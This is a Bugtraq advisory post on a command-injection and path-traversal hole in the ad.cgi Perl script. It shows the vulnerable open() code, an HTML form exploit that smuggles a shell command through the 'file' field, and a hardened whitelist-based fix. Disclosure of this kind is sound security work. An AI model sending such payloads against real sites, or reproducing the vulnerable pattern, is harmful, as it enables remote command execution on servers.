Bugtraq mailing list archives
Insecure input validation in ad.cgi
From: rpc <h () ckz org>
Date: Mon, 11 Dec 2000 15:10:22 GMT
Hi,

ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure input validation vulnerability. Information on ad.cgi is available at:
http://www.conservatives.net/atheist/scripts/index.html?ads

----code snippet----
$filename = "$FORM{'file'}";
$datafile = "$basedir" . "$filename";
...
open (INFO, "$datafile");
-----------------

Exploit:

<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>
</form>
</html>
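The snippet above fails for two reasons: the 'file' field is concatenated onto $basedir with no validation, and the two-argument open() parses its string for a mode, so a trailing '|' turns the "file name" into a command pipe. The following is an added example, not the script's own code or a vendor fix: the vulnerable pattern beside a hardened version that whitelists the name and uses the three-argument open(). The $basedir value and the sample inputs are assumed for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;

my $basedir = "/var/www/ads/";   # assumed base directory, not taken from the post

# Vulnerable pattern as posted: 'file' reaches open() unchanged, and the
# two-argument open() treats a trailing '|' as "run this as a shell command".
sub open_ad_vulnerable {
    my ($filename) = @_;
    my $datafile = "$basedir" . "$filename";
    open(my $info, "$datafile") or return undef;   # mode is parsed out of the string
    return $info;
}

# Hardened version (added here):
#  1. accept only a plain file name: letters, digits, '_', '-', '.', so '/',
#     '|', whitespace and other shell metacharacters are rejected outright
#  2. reject any '..' sequence as a second line of defence against traversal
#  3. build the path with File::Spec and open it with an explicit '<' mode,
#     so the user-supplied name can never be interpreted as a mode or a pipe
sub validate_ad_filename {
    my ($filename) = @_;
    return undef unless defined $filename;
    return undef unless $filename =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\z/;  # whitelist, no leading '.'
    return undef if $filename =~ /\.\./;
    return File::Spec->catfile($basedir, $filename);
}

sub open_ad_safe {
    my ($filename) = @_;
    my $path = validate_ad_filename($filename) or return undef;
    open(my $info, '<', $path) or return undef;    # 3-arg open: '<' is the mode, never the data
    return $info;
}

# Constructed inputs: the post's exploit value and an ordinary ad file name.
for my $input ("../../../../../../../../bin/ping -c 5 www.foo.com|", "ad1.txt") {
    printf "%-55s -> %s\n", $input,
        defined validate_ad_filename($input) ? "accepted" : "rejected";
}
```

On a real deployment the same check should also confirm that the resolved path still lies under $basedir (for example via Cwd::abs_path once the file is known to exist), and the web server log can be searched for requests whose 'file' parameter contains '../' or '|' to spot probing of this bug.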